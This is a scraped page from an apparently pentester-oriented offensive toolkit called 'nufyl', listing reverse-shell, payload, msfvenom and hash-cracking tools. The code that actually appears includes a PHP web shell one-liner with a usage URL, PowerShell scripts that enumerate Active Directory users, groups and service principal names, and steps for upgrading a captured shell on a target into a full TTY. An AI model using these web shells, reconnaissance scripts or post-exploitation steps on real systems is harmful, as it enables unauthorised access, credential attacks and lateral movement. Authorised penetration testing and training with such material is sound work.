offensive security toolkit

nufyl

Reverse shells, payloads, exploitation references and live tooling — built for pentesters.

root@nufyl:~$ select --tool
reverse shells

Shell Generator

One-liner reverse shells across 20+ languages. Set your LHOST/LPORT and chain encodings.

⚙️configuration
🔗encoding chainchainable — applied in order
📤generated payload
bash
loading...
👂listener commands
payload library

Payload Library

Curated exploitation payloads across web attack categories. Filter, search, copy.

php shells

PHP Shells

PHP reverse shells, web shells, and obfuscated one-liners for post-upload exploitation.

🐘pentestmonkey reverse shell

Full-featured PHP reverse shell by pentestmonkey. Edit $ip and $port before uploading.

php

        
basic rce one-liner
php
<?php system($_GET["cmd"]);?>

Usage: http://target.com/shell.php?cmd=id

🕵️obfuscated web shells
lfi / path traversal

LFI / Path Traversal

Local file inclusion payloads, PHP wrappers, and useful target files for Linux/Windows/Apache/MySQL.

cross-site scripting

XSS Payloads

XSS payloads for HTML, SVG, Markdown contexts plus data grabbers and blacklist bypasses.

sql injection

SQL Injection

UNION, error-based, blind/time-based, and auth bypass payloads for MySQL, MSSQL, Oracle, PostgreSQL.

linux recon

Linux Commands

Post-exploitation Linux enumeration, SUID, cron, network, privesc, and file transfer commands.

windows / active directory

Windows & AD

PowerShell enumeration, Active Directory recon via PowerView, and AD LDAP scripts.

powershell — enumerate domain users
$domainObj = [System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()
$PDC = ($domainObj.PdcRoleOwner).Name
$SearchString = "LDAP://" + $PDC + "/"
$DistinguishedName = "DC=$($domainObj.Name.Replace('.', ',DC='))"
$SearchString += $DistinguishedName
$Searcher = New-Object System.DirectoryServices.DirectorySearcher([ADSI]$SearchString)
$objDomain = New-Object System.DirectoryServices.DirectoryEntry
$Searcher.SearchRoot = $objDomain
$Searcher.filter = "samAccountType=805306368"
$Result = $Searcher.FindAll()
Foreach($obj in $Result) {
  Foreach($prop in $obj.Properties) { $prop }
  Write-Host "------------------------"
}
powershell — enumerate domain groups
$domainObj = [System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()
$PDC = ($domainObj.PdcRoleOwner).Name
$SearchString = "LDAP://" + $PDC + "/" + "DC=$($domainObj.Name.Replace('.', ',DC='))"
$Searcher = New-Object System.DirectoryServices.DirectorySearcher([ADSI]$SearchString)
$Searcher.SearchRoot = New-Object System.DirectoryServices.DirectoryEntry
$Searcher.filter = "(objectClass=Group)"
$Searcher.FindAll() | Foreach { $_.Properties.name }
powershell — detect SPNs
$domainObj = [System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()
$PDC = ($domainObj.PdcRoleOwner).Name
$SearchString = "LDAP://" + $PDC + "/" + "DC=$($domainObj.Name.Replace('.', ',DC='))"
$Searcher = New-Object System.DirectoryServices.DirectorySearcher([ADSI]$SearchString)
$Searcher.SearchRoot = New-Object System.DirectoryServices.DirectoryEntry
$Searcher.filter = "serviceprincipalname=*http*"
$Searcher.FindAll() | Foreach {
  Foreach($prop in $_.Properties) { $prop }
}
encoding / hashing

Encoding & Hash Cracker

Encode, decode, hash, and crack. Powered by client-side JS and the Hashes.com API for lookups.

text encoding
binary / hex
ciphers / obfuscation
special formats
hashes.com api key

Get a free key at hashes.com/en/api/docs. Key stored in localStorage.

looking up hash...
looking up hashes...
metasploit

MSFvenom Builder

Build msfvenom payload commands and handler one-liners. All options configurable.

⚙️payload configuration
📤generated commands
bash

            
shell stabilization

TTY Upgrade

Stabilize a dumb shell into a fully interactive TTY with arrow keys, tab-complete, and Ctrl+C.

🖥️fully interactive TTY (recommended)
1
spawn a PTY with Python
Run on the target — gives you a bash shell with basic TTY features.
bash
python3 -c 'import pty;pty.spawn("/bin/bash")'
2
set TERM variable
Enables clear, colours and term commands.
bash
export TERM=xterm
3
background the shell
Hit Ctrl+Z to background the netcat process on your attacking machine.
keys
Ctrl + Z
4
disable local echo + foreground
Run on your local machine. Turns off terminal echo, enabling tab-autocomplete and arrow keys.
bash
stty raw -echo; fg
5
fix terminal size
Get your local stty size first: stty size, then set it on the target.
bash
stty rows 38 columns 116
quick spawn methods
restricted access
invalid credentials